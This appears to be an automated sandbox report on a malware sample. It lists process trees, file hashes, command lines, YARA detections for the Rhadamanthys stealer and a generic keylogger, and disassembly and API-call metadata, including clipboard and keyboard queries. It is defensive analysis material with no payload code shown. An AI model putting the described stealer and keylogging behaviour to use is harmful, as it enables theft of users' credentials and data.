                                                                                                                                                                                                                                                                                                      Has exited:false

                                                                                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                                                                                      Target ID:30
                                                                                                                                                                                                                                                                                                      Start time:14:07:55
                                                                                                                                                                                                                                                                                                      Start date:10/12/2024
                                                                                                                                                                                                                                                                                                      Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                      Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2140 --field-trial-handle=2068,i,17729385765362117202,6061086307016693988,262144 /prefetch:3
                                                                                                                                                                                                                                                                                                      Imagebase:0x7ff7fb980000
                                                                                                                                                                                                                                                                                                      File size:4'210'216 bytes
                                                                                                                                                                                                                                                                                                      MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                                                                                      Target ID:31
                                                                                                                                                                                                                                                                                                      Start time:14:08:02
                                                                                                                                                                                                                                                                                                      Start date:10/12/2024
                                                                                                                                                                                                                                                                                                      Path:C:\Users\user\AppData\Local\Temp\1061714629.exe
                                                                                                                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                      Commandline:"C:\Users\user~1\AppData\Local\Temp\1061714629.exe"
                                                                                                                                                                                                                                                                                                      Imagebase:0x400000
                                                                                                                                                                                                                                                                                                      File size:2'764'800 bytes
                                                                                                                                                                                                                                                                                                      MD5 hash:DFED8A8BF0531716FD932A0A81CB14CD
                                                                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                      Antivirus matches:
                                                                                                                                                                                                                                                                                                      • Detection: 55%, ReversingLabs
                                                                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                                                                                      Target ID:34
                                                                                                                                                                                                                                                                                                      Start time:14:08:19
                                                                                                                                                                                                                                                                                                      Start date:10/12/2024
                                                                                                                                                                                                                                                                                                      Path:C:\Users\user\AppData\Local\Temp\1061714629.exe
                                                                                                                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                      Commandline:"C:\Users\user~1\AppData\Local\Temp\1061714629.exe"
                                                                                                                                                                                                                                                                                                      Imagebase:0x400000
                                                                                                                                                                                                                                                                                                      File size:2'764'800 bytes
                                                                                                                                                                                                                                                                                                      MD5 hash:DFED8A8BF0531716FD932A0A81CB14CD
                                                                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                      Yara matches:
                                                                                                                                                                                                                                                                                                      • Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 00000022.00000003.1896994723.0000000000B20000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                      • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000022.00000003.1900857144.00000000030D0000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                      • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000022.00000003.1900624888.0000000002EB0000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                      • Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 00000022.00000002.1911870837.0000000000B30000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                                                                                      Target ID:35
                                                                                                                                                                                                                                                                                                      Start time:14:08:21
                                                                                                                                                                                                                                                                                                      Start date:10/12/2024
                                                                                                                                                                                                                                                                                                      Path:C:\Windows\SysWOW64\fontdrvhost.exe
                                                                                                                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                      Commandline:"C:\Windows\System32\fontdrvhost.exe"
                                                                                                                                                                                                                                                                                                      Imagebase:0x80000
                                                                                                                                                                                                                                                                                                      File size:676'584 bytes
                                                                                                                                                                                                                                                                                                      MD5 hash:8D0DA0C5DCF1A14F9D65F5C0BEA53F3D
                                                                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                      Yara matches:
                                                                                                                                                                                                                                                                                                      • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000023.00000003.1907247856.00000000052F0000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                      • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000023.00000003.1907566147.0000000005510000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                      • Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 00000023.00000003.1903700839.0000000002DF0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                      • Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 00000023.00000002.2024542815.0000000003400000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                                                                                      Target ID:38
                                                                                                                                                                                                                                                                                                      Start time:14:08:22
                                                                                                                                                                                                                                                                                                      Start date:10/12/2024
                                                                                                                                                                                                                                                                                                      Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                      Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 9716 -s 432
                                                                                                                                                                                                                                                                                                      Imagebase:0x490000
                                                                                                                                                                                                                                                                                                      File size:483'680 bytes
                                                                                                                                                                                                                                                                                                      MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                                                                                      Target ID:39
                                                                                                                                                                                                                                                                                                      Start time:14:08:33
                                                                                                                                                                                                                                                                                                      Start date:10/12/2024
                                                                                                                                                                                                                                                                                                      Path:C:\Windows\System32\fontdrvhost.exe
                                                                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                      Commandline:"C:\Windows\System32\fontdrvhost.exe"
                                                                                                                                                                                                                                                                                                      Imagebase:0x7ff6080a0000
                                                                                                                                                                                                                                                                                                      File size:827'408 bytes
                                                                                                                                                                                                                                                                                                      MD5 hash:BBCB897697B3442657C7D6E3EDDBD25F
                                                                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                                                                                      Target ID:41
                                                                                                                                                                                                                                                                                                      Start time:14:08:36
                                                                                                                                                                                                                                                                                                      Start date:10/12/2024
                                                                                                                                                                                                                                                                                                      Path:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\WerFault.exe -u -p 9952 -s 140
                                                                                                                                                                                                                                                                                                      Imagebase:0x7ff640ed0000
                                                                                                                                                                                                                                                                                                      File size:570'736 bytes
                                                                                                                                                                                                                                                                                                      MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                                                                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                                                                                      Target ID:42
                                                                                                                                                                                                                                                                                                      Start time:14:08:39
                                                                                                                                                                                                                                                                                                      Start date:10/12/2024
                                                                                                                                                                                                                                                                                                      Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                      Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-GB --service-sandbox-type=search_indexer --message-loop-type-ui --mojo-platform-channel-handle=6992 --field-trial-handle=1992,i,9439296956823989521,1542117106536220909,262144 /prefetch:8
                                                                                                                                                                                                                                                                                                      Imagebase:0x7ff7fb980000
                                                                                                                                                                                                                                                                                                      File size:4'210'216 bytes
                                                                                                                                                                                                                                                                                                      MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                      Has exited:false

                                                                                                                                                                                                                                                                                                      Disassembly

                                                                                                                                                                                                                                                                                                      Reset < >

                                                                                                                                                                                                                                                                                                        Executed Functions

                                                                                                                                                                                                                                                                                                        Function 00007FFAAB7933B5 Relevance: .0, Instructions: 49COMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.1630675031.00007FFAAB790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB790000, based on PE: false
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ffaab790000_powershell.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                                        • Opcode ID: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                                                                                                                                                                                                                                                                        • Instruction ID: b1e65471143f2844b230ed71ff2fda1b7ab4172bc61a6a0745b4548f68134739
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: FA01677115CB0C8FD744EF0CE451AA5B7E0FB95364F10056DE58AC3661DA36E882CB45

                                                                                                                                                                                                                                                                                                        Non-executed Functions

                                                                                                                                                                                                                                                                                                        Function 00007FFAAB794D0B Relevance: .8, Instructions: 818COMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.1630675031.00007FFAAB790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB790000, based on PE: false
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ffaab790000_powershell.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                                        • Opcode ID: 7284ed9da7465d60e5bba6a62d63bb9d672a04b40eb0ff7ead46fdc7f1ccf8eb
                                                                                                                                                                                                                                                                                                        • Instruction ID: 2280e889d87199c3395488c555ee00e2fc8ec0e75c5157cda566abf7bf881b9c
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7284ed9da7465d60e5bba6a62d63bb9d672a04b40eb0ff7ead46fdc7f1ccf8eb
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3F32B393A1FBC58FF6B9436C681517D6FA1EB832A0B0887F7D04C471FB58969D0A42D2

                                                                                                                                                                                                                                                                                                        Executed Functions

                                                                                                                                                                                                                                                                                                        Function 00007FFAAB7933B5 Relevance: .0, Instructions: 49COMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000011.00000002.1791116820.00007FFAAB790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB790000, based on PE: false
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_17_2_7ffaab790000_powershell.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                                        • Opcode ID: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                                                                                                                                                                                                                                                                        • Instruction ID: b1e65471143f2844b230ed71ff2fda1b7ab4172bc61a6a0745b4548f68134739
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: FA01677115CB0C8FD744EF0CE451AA5B7E0FB95364F10056DE58AC3661DA36E882CB45

                                                                                                                                                                                                                                                                                                        Execution Graph

                                                                                                                                                                                                                                                                                                        Execution Coverage:0%
                                                                                                                                                                                                                                                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                                                                                        Signature Coverage:3.9%
                                                                                                                                                                                                                                                                                                        Total number of Nodes:51
                                                                                                                                                                                                                                                                                                        Total number of Limit Nodes:0
                                                                                                                                                                                                                                                                                                        execution_graph 33916 42b640 45 API calls 33922 40de70 26 API calls 33837 424870 OpenClipboard GetClipboardData GetClipboardData GetClipboardData CloseClipboard 33925 417273 28 API calls 33926 420670 16 API calls 33929 4c9670 GetCurrentThreadId GetKeyboardLayout GetLocaleInfoA 33839 4dc870 EnterCriticalSection LeaveCriticalSection 33935 4275fe 16 API calls 33842 4d8000 EndDoc 33936 40d210 46 API calls 33846 4fc810 InitializeCriticalSection 33941 408220 14 API calls 33848 401031 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection 33849 41d430 56 API calls 33950 4012c0 16 API calls 33953 40fad0 26 API calls 33852 4118d0 7 API calls 33854 4144de 34 API calls 33957 4086e0 19 API calls 33855 41d8e0 35 API calls 33856 4210e0 InterlockedCompareExchange Sleep InterlockedCompareExchange InterlockedExchange 33959 41bee8 19 API calls 33966 411a80 27 API calls 33967 40c290 QueryPerformanceCounter QueryPerformanceCounter 33867 427090 GetACP GetCPInfo 33869 401ca0 278 API calls 33970 40eaa0 28 API calls 33874 41b4b0 48 API calls 33973 41eab0 28 API calls 33979 4f9340 CoCreateInstance 33880 40d560 29 API calls 33982 417f61 29 API calls 33881 401170 12 API calls 33988 50af60 CoTaskMemAlloc 33826 4dc300 GetCommandLineA 33827 42c310 33826->33827 33886 40fd10 39 API calls 33823 44a710 33824 44a712 ExitProcess 33823->33824 33892 40d530 25 API calls 34000 41ef32 26 API calls 33893 40cdc0 17 API calls 34005 4ddfc0 64 API calls 34006 4263cc 18 API calls 33896 40d1d0 24 API calls 33898 41e5d0 GetSystemTime GetTimeZoneInformation 34007 42abd0 30 API calls 33902 41cde0 36 API calls 33905 412180 25 API calls 34014 4dd780 46 API calls 33908 428191 26 API calls

                                                                                                                                                                                                                                                                                                        Executed Functions

                                                                                                                                                                                                                                                                                                        Function 0044A710 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 20COMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                                                                        control_flow_graph 0 44a710-44a719 2 44a729 0->2 3 44a71b-44a727 0->3 4 44a73a-44a748 ExitProcess 2->4 3->4
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • ExitProcess.KERNEL32(00000000), ref: 0044A748
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000001F.00000002.1932835041.0000000000401000.00000020.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1932805887.0000000000400000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1932944234.000000000053D000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1932991947.0000000000555000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1932991947.0000000000562000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933070346.0000000000628000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933122608.0000000000674000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933192683.00000000006E7000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933222066.00000000006EA000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933249657.00000000006F5000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933282783.00000000006F9000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933314038.0000000000700000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933349244.0000000000703000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933377675.0000000000709000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933407438.000000000070E000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933443184.000000000073C000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933473851.000000000073F000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_31_2_400000_1061714629.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: ExitProcess
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 621844428-399585960
                                                                                                                                                                                                                                                                                                        • Opcode ID: 293620465462d170643fb551289f4f82b8ddd7fd95f4a21ffe41ffa866c1d984
                                                                                                                                                                                                                                                                                                        • Instruction ID: 4153d7d145e48ef0bfada68ad49838f97c765877aadb4e058581a2a78d09dbec
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 293620465462d170643fb551289f4f82b8ddd7fd95f4a21ffe41ffa866c1d984
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E7E04F75E4A25CCEEB30CA56EC017B8B775EB94316F0040EBD54D96241C6344D958F56
                                                                                                                                                                                                                                                                                                        Function 0044A6E0 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                                                                        control_flow_graph 5 44a6e0-44a6fa 6 44a6fc-44a706 5->6 7 44a708 5->7 8 44a712-44a719 6->8 7->8 9 44a729 8->9 10 44a71b-44a727 8->10 11 44a73a-44a748 ExitProcess 9->11 10->11
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • ExitProcess.KERNEL32(00000000), ref: 0044A748
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000001F.00000002.1932835041.0000000000401000.00000020.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1932805887.0000000000400000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1932944234.000000000053D000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1932991947.0000000000555000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1932991947.0000000000562000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933070346.0000000000628000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933122608.0000000000674000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933192683.00000000006E7000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933222066.00000000006EA000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933249657.00000000006F5000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933282783.00000000006F9000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933314038.0000000000700000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933349244.0000000000703000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933377675.0000000000709000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933407438.000000000070E000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933443184.000000000073C000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933473851.000000000073F000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_31_2_400000_1061714629.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: ExitProcess
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 621844428-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: 301b0aacc8fca0e78445999e19763b72f532b71fd961c991c7f3581a4234fff3
                                                                                                                                                                                                                                                                                                        • Instruction ID: 1ceb8dd2f8bb3b7ec6cf47d3eabd97270618131fd29c238ba72ea5f4f3f95bef
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 301b0aacc8fca0e78445999e19763b72f532b71fd961c991c7f3581a4234fff3
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 79F01C7494622DCEEF308F61C8457ACB7B0BB04315F1082EAC46D67780C3348E829F86
                                                                                                                                                                                                                                                                                                        Function 004DC300 Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                                                                        control_flow_graph 12 4dc300-4dc310 GetCommandLineA call 42c310
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000001F.00000002.1932835041.0000000000401000.00000020.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1932805887.0000000000400000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1932944234.000000000053D000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1932991947.0000000000555000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1932991947.0000000000562000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933070346.0000000000628000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933122608.0000000000674000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933192683.00000000006E7000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933222066.00000000006EA000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933249657.00000000006F5000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933282783.00000000006F9000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933314038.0000000000700000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933349244.0000000000703000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933377675.0000000000709000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933407438.000000000070E000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933443184.000000000073C000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933473851.000000000073F000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_31_2_400000_1061714629.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: CommandLine
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 3253501508-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: 04003b1c6e78a75645abe312a21659dec6fb72e0dd25253600e7555adc4d96f0
                                                                                                                                                                                                                                                                                                        • Instruction ID: 324ae4de550c7ee1837b525cc46cc1c53208b04041f71095fcaff5b360da8b69
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 04003b1c6e78a75645abe312a21659dec6fb72e0dd25253600e7555adc4d96f0
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 51B012788003A00E83717B3834455CE7FF50C1D2E43844A58FCC1A3315D61488975AFA

                                                                                                                                                                                                                                                                                                        Non-executed Functions

                                                                                                                                                                                                                                                                                                        Function 004D7960 Relevance: 70.1, APIs: 20, Strings: 20, Instructions: 118COMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                                                                        • Not Executed
